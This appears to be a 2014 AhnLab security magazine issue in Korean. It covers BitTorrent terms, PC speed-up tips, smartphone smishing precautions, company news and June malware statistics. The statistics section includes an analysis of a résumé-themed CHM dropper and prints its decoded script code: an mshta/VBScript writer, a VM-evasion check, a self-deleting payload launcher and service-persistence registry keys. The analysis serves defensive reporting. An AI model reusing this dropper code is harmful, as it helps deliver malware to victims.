3. 마그넷 링크
- Torrent 파일이 없더라도 파일의 공유가 가능하도록 만든 웹 url
4. Tracker
- 공유되고 있는 파일들의 이름, 파일 크기, 파일의 해시 값 등 파일에 대한 메타 정보
와 해당 파일을 공유하고 있는 클라이언트들에 대한 정보를 가지고 있음
- 공유에 참여하고자 하는 클라이언트들에게 필요한 정보를 제공해줌
5. Peer
- 본래 ‘또래’, ‘동료’라는 의미의 영어 단어로, P2P 기술과 관련해 파일의 공유에 참여
하고 있는 클라이언트를 의미함
6. Seeder
- 공유 파일 전체를 보유하고 있으면서, Peer 들에게 파일을 업로드하는 Peer들
- 파일의 최초 유포자, 또는 파일 다운로드를 100% 완료한 Peer들이 여기에 속함
7. Piece
- Peer 간의 파일 데이터 전송 단위
- BitTorrent는 파일을 일정한 크기의 Piece로 나누고, Peer와 Peer 간에 서로가 보유
하고 있는 Piece를 주고받게 하는 식으로 파일의 공유가 이루어지게 함
2222
i T & l i F E
느려진 PC 빠르게 사용하는 방법
자꾸만 느려지는 PC. 불필요한 프로그램이 많지 않은지, 바이러스나 악성코드에 감염된 것은 아닌지 체크해봐야 할 것이 한둘이 아
니지만 PC 속도를 조금은 빠르게 하려면 꼭 한번은 필요한 작업이다. 몇 가지 기본적인 작업을 통해 쉽게 점검해볼 수 있는 방법을
소개한다. 단 윈도 7에 해당되므로 윈도 버전을 확인하고 실행해볼 것을 권하며 PC 성능과 사양에 따라 효과의 차이가 있다.
바탕화면 정리하기
PC가 느려졌다고 생각한다면 먼저 바탕화면의 아이콘 상태를 확인해보자. 너무 많은 아이콘이 바탕화면에 있는 것은 아닌지, 문서나 용량이
큰 이미지 파일을 저장해둔 것은 아닌지. 바탕화면에 아이콘은 2줄이 적당하며 그 이상이 되면 프로그램을 실행하는데 영향을 준다. 또한 바탕
화면에는 폴더 아이콘은 놓지 않고 로컬디스크(C 드라이브)가 아닌 다른 드라이브에 저장할 것을 권한다.
쿠키 삭제
인터넷 쿠키 삭제가 별 거 아니라고 생각하는 사람들이 많다. 사이트 방문 시 다운받은 사진이나 파일 등은 임시 인터넷 파일에 쌓인다. 이 기록
은 접속했던 사이트에 재접속하면 이전의 정보를 읽어와 해당 사이트를 여는데 속도가 빨라질 뿐이지 인터넷 속도 자체는 쌓였던 임시 인터넷
파일과 쿠키로 느려질 수도 있다. 따라서 그동안 정리하지 않았던 임시 인터넷 파일과 쿠키를 정리하면 인터넷 속도가 조금은 빨라질 것이다.
[인터넷 옵션] → [삭제] → [검색 기록 삭제] → 쿠키 및 웹사이트 데이터 체크 후 삭제버튼 클릭
디스크 정리로 불필요한 파일 삭제하기
디스크 정리는 하드디스크에서 불필요한 파일 수를 줄여 디스크 공간을 확보하고 PC 속도 개선에 도움을 준다. 디스크 정리를 하면 임시 파일
제거, 휴지통 비움 등 더 이상 필요하지 않은 여러 가지 시스템 파일과 기타 항목들을 제거할 수 있다.
방법도 간단하다. [시작] → 프로그램 및 파일 검색창에 ‘디스크정리’라고 입력하면 [디스크정리 : 드라이브 선택] 창이 뜬다. 드라이브를 순서대
로 선택해서 확인을 눌러주면 디스크 정리가 된다. 디스크 정리를 통해 해당 드라이브에서 최대 MB~GB의 디스크 공간을 확보할 수 있다는 메
시지가 뜬다. 삭제할 파일을 확인한 후 체크하고 확인을 눌러주면 된다. C 드라이브부터 D, E 등 순서대로 진행하면 된다.
조각난 하드디스크 조각 모음하기
디스크 정리가 끝났다면 디스크 조각 모음을 해보자. 조각난 하드디스크는 추가 작업을 수행하기 때문에 PC 성능을 저하시킬 수 있다. 디스크
조각 모음은 조각난 데이터를 다시 정렬하여 디스크 및 드라이브를 효율적으로 사용할 수 있어 많은 사람들이 PC 성능을 위해 자주 이용하는
방법이다.
[제어판] → [시스템 및 보안] → [관리 도구] → [하드 드라이브 조각 모음] 또는 [시작] → 프로그램 및 파일 검색창에서 ‘디스크 조각 모음’을 입
력한 후 검색하면 바로 [디스크 조각 모음]으로 이동한다.
2323
시작프로그램 정리하기
윈도 시작프로그램은 윈도가 시작될 때 동시에 실행되는 프로그램이다. 시작프로그램이 많으면 PC가 부팅되는 시간도 그 만큼 오래 걸린다. 시
작프로그램을 정리해주면 부팅 속도도 좀더 빨라지고 PC 성능도 조금은 나아지는 것을 느낄 수 있다.
[시작] → 프로그램 및 파일 검색 창에 ‘msconfig’를 입력하면 [시스템 구성] 창이 뜬다. 시작프로그램 탭을 클릭하면 시작항목에 대부분 체크돼
있는 것을 확인할 수 있다. 체크된 프로그램이 어떤 것인지 확인한 후 필요하다고 판단되는 프로그램만 체크하고 그 외의 프로그램은 체크 해제
하면 된다. PC를 재부팅하면 변경이 적용된 것을 알 수 있다.
불필요한 서비스 항목 제거
[시스템 구성] → [서비스]에서 불필요한 서비스 항목을 제거해준다. 이때 ‘모든 Microsoft 서비스 숨기기’에 체크한 뒤 나머지 서비스는 체크 해
제하면 된다. 꼭 필요한 서비스 항목은 그대로 두고 적용해야 한다는 점을 염두에 둬야 한다.
바이러스검사와 레지스트리 정리, PC 최적화까지
바이러스나 악성코드 감염은 PC가 느려지는 원인이 되기도 한다. 악성코드를 비롯해 외부 위협 요소가 많다 보니 상호 보완 차원에서 바이러스
프로그램을 2개 이상 설치해서 사용하는 사람도 많다. 각각 프로그램마다 장단점이 있지만 가급적 한 개의 프로그램만 사용할 것을 권한다. 제
품 간 충돌 우려는 물론 시스템 성능이 저하되기도 한다.
안랩 V3라이트는 악성코드 감지는 물론 사용자의 PC 최적화에 도움을 준다. PC 최적화 기능을 사용하면 레지스트리 청소, 시스템 내 휴지통 비
우기, 시스템 임시 파일 정리 등 인터넷 쿠키 정리까지 해준다. 사용자가 원하는 항목에 체크해서 최적화 시키면 된다.
[V3] → [도구] → [PC 최적화]
유의해야 할 점은 PC 성능이 떨어진다고 해서 무조건 디스크 조각 모음을 해야 하는 것은 아니다. 디스크 조각 모음을 하기 전에 조각 모음을
할 디스크를 선택해서 디스크 조각 모음이 필요한지 디스크 분석을 해야 한다. 윈도에서 디스크 분석이 완료되면 마지막 실행 열에서 디스크의
조각화 비율을 확인할 수 있다. 비율이 10%를 넘으면 디스크 조각 모음을 해야 한다.
단, 다른 프로그램에서 디스크를 이미 단독으로 사용하고 있거나 디스크가 nTFS 파일 시스템, FAT 또는 FAT32 이외의 다른 파일 시스템을 사
용하여 포맷한 경우에는 조각 모음을 실행할 수 없다.
위의 방법 외에도 안랩 PC 주치의의 도움을 받아보자. PC 주치의는 안랩의 PC전문가들이 PC에 발생한 다양한 문제에 대해 원격지에서 문제가
있는 PC로 접속하여 해결해주는 V3 365 클리닉의 원격 지원 서비스다. 안랩 PC 주치의 서비스는 유료다.
2424
i T & l i F E
스마트폰 보안 수칙, ‘이것’만은 지키자!
외부 위협에 노출된 스마트폰을 안전하게 사용하려면 ‘절대’ 하지 말아야 할 것이 있다. 호시탐탐 스마트폰 사용자를 노리고 있는 해
커로부터 안전하기 위해서는 어떻게 해야 하는지 알아보자.
주부 A씨는 아이 용품부터 생활용품까지 스마트폰으로 쇼핑을 즐기는 ‘모바일 쇼핑족’이다. 웬만한 소셜 커머스 앱을 두루 섭렵하고 있는 그녀
이기에 매일 따끈따끈한 쇼핑 정보 소식도 스마트폰으로 받아 보고 있다. 또 발품을 팔 필요 없이 가격 비교 사이트에서 제품을 검색하면 최저
가 사이트로 안내해주니 얼마나 편리한가. 여기에 주부 A씨는 스마트폰으로 모바일 뱅킹도 이용한다. 평소 건망증이 있다 보니 스마트폰에 거
래 은행의 보안카드를 사진으로 저장해두었다. 급하게 인터넷 뱅킹을 해야 할 때 언제 어디에서나 와이파이만 연결되면 스마트폰으로 바로 이
용할 수 있어 A씨에게 모바일 뱅킹은 없어서는 안 될 존재이다.
모바일 쇼핑, 모바일 뱅킹은 언제 어디서나 이용할 수 있다는 편리함 때문에 많은 이들이 애용하고 있다. 하지만 해커들은 모바일족을 호시탐탐
노리고 있다는 점에 스마트폰 사용자들은 주목해야 한다. 바로 ‘스미싱’이다. 초기 스미싱은 이전에 유출된 개인정보와 스미싱을 통해 탈취한 통
신사정보, 인증용 문자메시지를 결합해 소액결제를 유도하는 형태였다. 하지만, 최근에는 쇼핑 등 서비스 제공 업체들의 사이트와 구별하기 어
려운 유사한 가짜 사이트(파밍 사이트)를 제작하는 등 고도화된 스미싱 수법이 나타나고 있다. 이를 통해 공인인증서, iD 및 비밀번호, 통신사
정보, 문자메시지 등 금융 거래 및 결제에 필요한 모든 정보를 탈취해 간다. 뿐만 아니라 주소록 정보까지도 유출해 스미싱 수신자들을 기하급
수적으로 늘려 가는 등 대형 보안사고의 시작점으로 변하고 있다는 것이 문제다.
따라서 해커들의 교묘하고 고도화된 사기 수법에 넘어가지 않고 안전하게 모바일 쇼핑을 즐기기 위해서는 주부 A씨 처럼 보안카드 등 매우 중
요한 개인 금융 정보를 사진이나 메모 등을 스마트폰에 저장하는 일은 절대 하지 말아야 한다. 또한 외부에서 스마트폰으로 와이파이를 이용할
때는 확인되지 않는 공유기 접속도 가급적 자제해야 한다. 특히 많은 사람들이 사용하는 공개된 와이파이존에서는 금융거래는 하지 않고 3G로
전환하여 사용할 것을 권한다.
그 밖에도 안랩이 항상 강조하고 있는 스마트폰 보안 수칙은 ▲문자 메시지나 SnS(Social networking Service)등에 포함된 URl 실행을 자제
하고 만약 수상한 URl을 실행하거나 앱을 설치 했을 때는 모바일 전용 보안 프로그램을 통해 스마트폰을 검사해야 한다. ▲반드시 모바일 전용
보안 앱(V3 Mobile 등)이나 스미싱 탐지 앱을 설치하고 자동업데이트 등으로 항상 최신 엔진을 유지해야 한다. 또한, 보안 앱으로 주기적인 스
마트폰 검사 ▲공식 마켓 이외의 출처의 앱 설치 방지를 위해 “알 수 없는 출처[소스]”의 허용 금지 설정을 하고, 공식 마켓에도 악성 앱이 등록
되어 있을 수 있어 평판 정보를 반드시 확인해야 한다.
1. 문자 메시지나 SnS(Social networking Service)등에 포함된 URl 실행 자제
2. 모바일 전용 보안 앱(V3 Mobile 등)이나 스미싱 탐지 앱을 설치하고 자동업데이트 등으로 최신 엔진 유지 및 주기적인 검사
3. 공식 마켓 이외의 출처의 앱 설치 방지를 위한 “알 수 없는 출처[소스]”의 허용 금지 설정
- 공식 마켓에도 악성 앱이 등록되어 있을 수 있어 평판 정보를 반드시 확인하자!
4. 스마트폰으로 와이파이(Wi-Fi) 이용 시 외부에서 확인되지 않는 공유기 접속 자제
- 개인 공유기의 비밀번호도 반드시 유추하기 어려운 ‘문자+’숫자’로 설정해 혹시 모를 공격들을 사전에 차단시켜야 한다.
5. 보안카드 등 매우 중요한 개인 금융 정보를 사진 혹은 메모 등을 스마트폰에 저장해 두는 것은 절대 금지
안전한 모바일 쇼핑을 위한 보안 수칙
a h N l a b N E w S
25
안랩, 전사 교육 프로그램 개편
안랩이 변화하는 기업 환경에 맞추어 교육 프로그램의 새로운 변화
를 시도한다.
안랩은 2013년에 시범 운영했던 직위별 맞춤형 교육 프로그램인
‘직위별스쿨’과 임직원 참여형 조직활성화 프로그램인 ‘안랩함성’을
정규 프로그램으로 정착시키고, 기존 정규 프로그램과 통합하여 ‘안
랩스쿨’이라는 전사 교육프로그램으로 개편한다.
이에 따라 안랩은 ▲핵심가치 내재화와 목표 공유, 명사특강 등을
진행하는 ‘점프업’ ▲각 직위별 공통 역량과 직무 특성에 맞춘 ‘직위
별스쿨’ ▲구성원들의 멤버십 강화를 위한 ‘안랩함성’ 등 세분화된
교육 프로그램으로 전 임직원의 경쟁력 향상과 이를 통한 기업의 역
량강화에 주력한다. 또한, 이 과정들을 묶어 ‘안랩스쿨’이라는 브랜
드로 통칭해 안랩을 대표하는 전사 교육 프로그램으로 자리매김시
켜 나간다는 계획이다.
안랩 권치중 대표는 “기업의 힘은 임직원의 역량에서 나온다. 안랩
은 새로운 교육 프로그램으로 임직원 개개인의 역량을 강화시켜 ‘끊
임없는 연구개발로 함께 사는 사회에 기여한다’는 안랩의 존재 의미
를 실천해 나갈 것이다”고 말했다.
안랩, 2014 지배구조 우수기업 ‘우수상’ 수상
안랩이 지난달 3일 서울 여의도 한국거래소(KRX) 국제회의장에서
열린 한국기업지배구조원 주최 ‘2014 지배구조 우수기업’ 시상식에
서 ‘우수상’을 수상했다.
‘지배구조 우수기업’은 한국기업지배구조원이 매년 모든 상장 법인
을 대상으로 기업의 지배구조와 사회책임경영, 환경경영 등 지속가
능경영 능력을 종합적으로 평가해 선정한다. 안랩은 2008년 첫 수
상 이래 올해까지 6회째 수상했다.
지배구조
안랩은 2005년에 CEO와 이사회의 역할을 분리해 견제와 균형이 가
능한 지배구조를 갖췄다. 2007년에는 국내 벤처기업 중에서 이례적
으로 사외이사 비율을 50%로 확대한 데 이어 감사위원회를 설치했
다. 사외이사 제도와 감사위원회 설치는 투명하고 선진적인 지배구
조 경영의 핵심적인 요소로, 안랩은 선진화된 지배구조를 만들어 가
고 있다.
사회책임경영
안랩은 창립 이래 사회적 역할에 충실하고자 최선의 노력을 다하고
있다. 개인용 백신 V3 lite를 무료로 배포하고, 디도스 공격 등 국가
적 사이버 재난 시 솔선수범해 위기를 돌파해왔다. 국내 최고의 iT
꿈나무 육성 프로그램인 ‘V스쿨’을 꾸준히 개최하고, 전국 대학의 정
보보호학과, 컴퓨터공학과에 정규 과목 강의 등 적극적인 지식 기부
로 미래 보안 전문가를 양성하는데 기여하고 있다.
또한 안랩은 지역 기반 기업 사회 공헌 연합 ‘판교CSR얼라이언스’
회원사로 참여해 지역 내 중•고•대학생 등 연령별 맞춤 강연회와 유
용한 iT 정보 확산을 위한 ‘iT UCC 콘테스트’를 진행하고 있으며, 판
교테크노밸리 일대 육교를 쾌적하게 관리하는 환경미화 활동 ‘1사
(社) 1교(橋)’, 그리고 회원사 임직원들이 직접 기부한 물건을 아름다
운가게를 통해 판매하고 수익금을 사회에 환원하는 활동 등을 통해
지역 사회의 다양한 문제 해결에도 앞장서고 있다.
환경경영
아울러 안랩은 환경적으로 건전하고 지속 가능한 발전을 도모하고
있다. 판교 사옥을 친환경 업무 환경으로 조성한 한편, iT 기반 에너
지 관리 솔루션 운용 등으로 에너지 절감을 적극 실천하고 있다.
안랩 권치중 대표는 “안랩은 국내 대표 통합보안 기업으로서 매출
등 양적인 측면뿐만 아니라 연구개발(R&D), 회계투명성, 지배구조,
사회공헌(CSR), 복리후생, 환경경영 등 질적인 측면도 함께 발전시
키고자 부단히 노력해왔다”며, “이번 지배구조 우수기업 수상이 우
리 사회에 더 의미있는 성과를 만들어달라는 뜻이 담겨 있다고 생각
하고, 바람직한 기업의 역할을 충실히 해 나가겠다”라고 밝혔다.
한편, 안랩은 모범적인 투명 경영을 인정 받아 지난해 한국회계학회로
부터 ‘투명회계대상’을 받은 바 있으며, ‘제 11회 경제정의기업상(경실
련, 공정거래위, 2002년)’, ‘제 1회 한국윤리경영대상-투명경영 부문
대상(신산업경영원, 산업자원부, 2003년)’, ‘제 1회 경영정보대상-투명
경영 부문 대상(한국회계정보학회, 2003)’ 등을 수상하기도 했다.
26
보안 통계와 이슈 S T a T i S T i C S
6월, 전월 주춤했던 PUP 다시 강세
ASEC이 집계한 바에 따르면, 2014년 6월 한달 간 탐지된 악성코드
수는 170만 5,345건으로 나타났다. 이는 전월 171만 87건에 비해
4,742건 감소한 수치다. 한편 6월에 수집된 악성코드 샘플 수는 261
만 1,553건으로 집계됐다.
[그림 1]에서 ‘탐지 건수’란 고객이 사용 중인 V3 등 안랩의 제품이 탐
지한 악성코드의 수를 의미하며, ‘샘플 수집 수’는 안랩이 자체적으로
수집한 전체 악성코드 샘플 수를 의미한다.
[그림 2]는 2014년 6월 한달 간 유포된 악성코드를 주요 유형별로 집
계한 결과이다. 불필요한 프로그램인 PUP(Potentially Unwanted
Program)가 40.94%로 가장 높은 비중을 차지했고, 트로이목마
(Trojan)류의 악성코드가 33.28%, 애드웨어(Adware)가 8.27%로 그
뒤를 이었다.
2014년 6월에 악성코드 유포지로 악용된 도메인은 1,406개, URl은
1만 218개로 집계됐다([그림 3]). 또한 6월의 악성 도메인 및 URl 차
단 건수는 총 214만 7,161건이다([그림 4]). 악성 도메인 및 URl 차
단 건수는 PC 등 시스템이 악성코드 유포지로 악용된 웹사이트에 접
속하는 것을 차단한 수이다.
안랩 시큐리티대응센터(ASEC)는 ASEC Report Vol.54를 통해 지난 2014년 6월의 보안 통계 및 이슈를 전했다. 6월의 주요 보안 이
슈를 살펴본다.
문서 파일로 위장한 악성코드와
타깃 공격 주의
ASEC, 6월 악성코드 통계 및 보안이슈 발표
5,000,000
1,000,000
2,000,000
3,000,000
4,000,000
0
6월5월4월
2,717,050
1,705,3451,710,087
2,88
4,76
7
2,61
1,55
3
2,69
7,23
4
[그림 1] 악성코드 추이
샘플 수집 수탐지 건수
[그림 2] 주요 악성코드 유형
AdwareetcTrojanPUP
8.27%
17.51% 33.28%
40.94%
27
[표 1] CHM에 포함되어 있는 파일들
[표 2] 복호화된 자바 스크립트
2014년 6월 한달 간 탐지된 모바일 악성코드는 26만 3,993건으로
나타났다.
해당 스크립트를 복호화하면 [표 2]와 같이 ‘echo’ 명령어를 통해
“%temp%\s.vbs”를 생성하고 파일을 실행한다.
생성된 vbs는 프로세스 목록에서 chm 파일을 찾아 다운로드 하는
“1.htm”을 실행한다. “1.htm”은 난독화되어 있는데 이를 풀면 다음과
같이 소스코드를 확인할 수 있다.
이력서로 위장한 CHM 악성 파일
이력서로 위장한 CHM 파일이 발견돼 주의가 요구된다. CHM 파일에
는 [표 1]과 같이 여러 종류의 파일들이 포함되어 있다.
10,000
20,000
30,000
50,000
5,000,000
40,000
4,000,000
3,000,000
2,000,000
1,000,000
06월
19,644
3,186
10,218
1,406
7,575
1,257
5월4월
4,567,453
2,147,1611,776,498
악성 도메인/URL 차단 건수 악성코드 유포 URL 수악성코드 유포 도메인 수
[그림 3] 악성코드 유포 도메인/ URL 탐지 및 차단 건수
[그림 4] 모바일 악성코드 추이
50,000
100,000
150,000
250,000
200,000
0
6월
80,461
263,993
75,853
5월4월
/Main.html - 이력서 파일 + vbs 생성 하는 자바스크립트 (패킹)
/1.htm - 가상 머신 체크 후 xml.htm 을 불러와 악성 파일을 생성하는 vbs
/mypic.jpg - 이력서 사진
/Resume_screen.css - 이력서 css
/xml.htm - base64 encoding 된 악성파일
<object id='Writevbs0' type='application/x-oleobject' classid='clsid:adb880a6-
d8ff-11cf-9377-00aa003b7a11' STylE='display:none' codebase='hhctrl.
ocx#Version=4,74,8793,0'>
<param name='Command' value='ShortCut'>
<param name='item1' value=',mshta,vbscript:createobject("wscript.shell").
run("cmd /c echo On Error Resume next:Set w=GetObject(""winmgmts:\\.\root\
cimv2""):set q=w.execquery(""select * from win32_process""):For Each p in q:if
inStr(p.Commandline,"".chm"")>0 Then:url=""ms-its:""+Trim(Replace(Replace(p.
Commandline,p.executablepath,""""),Chr(34),""""))+""::/1.htm"":End if:next:Set
M=CreateObject(""CDO.Message""):m.CreateMHTMlBody url,31:execute(m.
HTMlBody)>%temp%\s.vbs",0)(window.close)'>
</object>
<object id='Download' type='application/x-oleobject' classid='clsid:adb880a6-
d8ff-11cf-9377-00aa003b7a11' STylE='display:none' codebase='hhctrl.
ocx#Version=4,74,8793,0'>
Download.HHClick()
fp=s.ExpandEnvironmentStrings("%temp%")&"\"&outfile
Set w = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\
cimv2")
set pa=w.execquery("select * from win32_process")
For Each p in pa
if lCase(p.caption) = lCase("vmtoolsd.exe") Then
delself()
CHM 파일을 클릭하면 [그림 5]와 같이 이력서 형식의 “Main.html”
파일을 실행한다. 이때 해당 html 파일에 첨부되어 있는 악성 자바스
크립트가 실행된다([그림 6]).
[그림 5] 이력서로 위장한 CHM 악성 파일
[그림 6] “Main.html”에 첨부되어 있는 자바 스크립트
28
wsh.quit
End if
if inStr(lCase(p.Commandline),lCase(".chm"))>0 Then
url="ms-its:"&Trim(Replace(Replace(p.Commandline,p.executablepath,""),C
hr(34),""))&"::/xml.htm"
... 중략 ...
End With
s.run fp,0
delself()
Sub delself()
CreateObject("Scripting.FileSystemObject").DeleteFile(wscript.scriptfullname)
End Sub
[파일 생성]
%TEMP%\en.dll
%SySTEMROOT%\Media\en.dll
[HKlM\SySTEM\ControlSet001\Services\VDM]
“Displayname”="Virtual Disk Manager"
“Objectname”="localSystem"
[HKlM\SySTEM\ControlSet001\Services\VDM\Parameters]
“ServiceDll”="C:\WinDOWS\Media\en.dll"
[표 3] 복호화된 “1.html vbs” 소스
[표 3]의 소스에서 현재 실행중인 프로세스 목록 중에 “vmtoolsd.
exe”가 있으면 종료 코드가 존재한다. 이는 가상 환경에서의 분석을
방해하기 위한 것이다. 이후 “xml.htm”에서 파일 스트링을 읽어와 저
장 후 실행한다.
주요 생성 파일은 다음과 같다.
그리고 시스템 재시작 시에도 실행될 수 있도록 다음과 같이 서비스
에 등록한다.
[그림 10]과 같이 파일 내부에는 몇 가지 기능을 짐작할 수 있는 스
트링 정보가 확인된다. 이 정보는 상위에 링크된 ASEC 블로그의
kimsuky 악성코드 분석 정보의 일부 내용과도 유사하다.
또한 특정 메일 계정정보([email protected])를 이용한 것이 확
인되었다. 이는 수집된 정보를 유출할 때 사용한 것으로 보인다. 해당
HWP 파일에 의한 악성코드 감염은 한글 2007 버전에서 확인되었으
며 한글 2010 버전에서는 감염이 이루어지지 않았다.
V3 제품에서는 관련 악성코드를 다음과 같이 진단하고 있다.
<V3 제품군의 진단명>
HWP/Exploit (2014.06.25.01)
Trojan/Win32.Kimsuky (2014.06.25.01)
생성된 악성코드는 iE(internet Explorer)를 방화벽에 예외 처리한 후
특정 iP에 비정상적으로 http에 접속하는 동작을 수행한다.
이러한 공격을 예방하기 위해서는 요구하지 않은 이력서나 의심스러
운 확장자의 파일은 열지 말아야 한다.
V3 제품에서는 관련 악성코드를 다음과 같이 진단하고 있다.
<V3 제품군의 진단명>
CHM/Exploit (2014.06.14.00)
Trojan/Win32.PlugX (2014.06.18.05)
특정인을 대상으로 유포된 한글 문서
특정인을 대상으로 유포된 것으로 보이는 의심스러운 한글 문서
(HWP)가 확인되었다. 정확한 유포 경로와 형태는 확인되지 않았지만
이메일을 통해 유포되었다. 취약점이 있는 한글 문서는 ‘성우회 연락
처.hwp’라는 파일명으로 성우회(예비역 장성 모임)와 관련된 수신인
을 대상으로 유포된 것으로 보인다.
이 파일의 일부 기능은 ‘kimsuky’ 악성코드와 유사하며 관련 변종으
로 확인되었다. Kimsuky 악성코드에 대한 자세한 분석 정보는 아래
의 링크를 통해 확인할 수 있다.
• “The “Kimsuky” Operation으로 명명된 한국을 대상으로 한 APT 공격
(2013/09/12)”
http://asec.ahnlab.com/968
• “APT 공격 - 새로운 “Kimsuky” 악성코드 등장 (2014/03/19)”
http://asec.ahnlab.com/993
[그림 7] “xml.htm”에 base64로 인코딩 되어 있는 악성코드
[그림 8] 한글 문서(HWP) 내용
[그림 9] 서비스 등록 확인
[그림 10] UAC(User Account Control) 우회
[그림 11] 백신 및 윈도 방화벽 무력화 시도
[그림 8]과 같이 한글 문서를 실행하면 ‘06성우회 연락처’라는 제목으
로 이름, 메일주소, 휴대전화번호 목록을 확인할 수 있다.
29
발행인 : 권치중
발행처 : 주식회사 안랩
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
편집인 : 안랩 콘텐츠기획팀
디자인 : 안랩 UX디자인팀
© 2014 AhnLab, Inc. All rights reserved.
본 간행물의 어떤 부분도 안랩의 서면 동의 없이 복제, 복사, 검색 시스템
으로 저장 또는 전송될 수 없습니다. 안랩, 안랩 로고는 안랩의 등록상표입
니다. 그 외 다른 제품 또는 회사 이름은 해당 소유자의 상표 또는 등록상
표일 수 있습니다. 본 문서에 수록된 정보는 고지없이 변경될 수 있습니다.
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
© 2014 Ahnlab, inc. All rights reserved.
http://www.ahnlab.com
http://blog.ahnlab.com
http://twitter.com/ahnlab_man
Related Documents
![소형 표면 조도 측정기15028_4]SJ-210_310... · 2020. 8. 24. · (Catalog No.4386) 를 참고해 주십시오. SURFTEST SJ-210/310시리즈용 이 통신 로그램 표면 조도·윤](https://static.cupdf.com/doc/110x72/5fe235dc303fce1fe87839cf/oe-oee-e-e-150284sj-210310-2020-8-24-catalog-no4386.jpg)
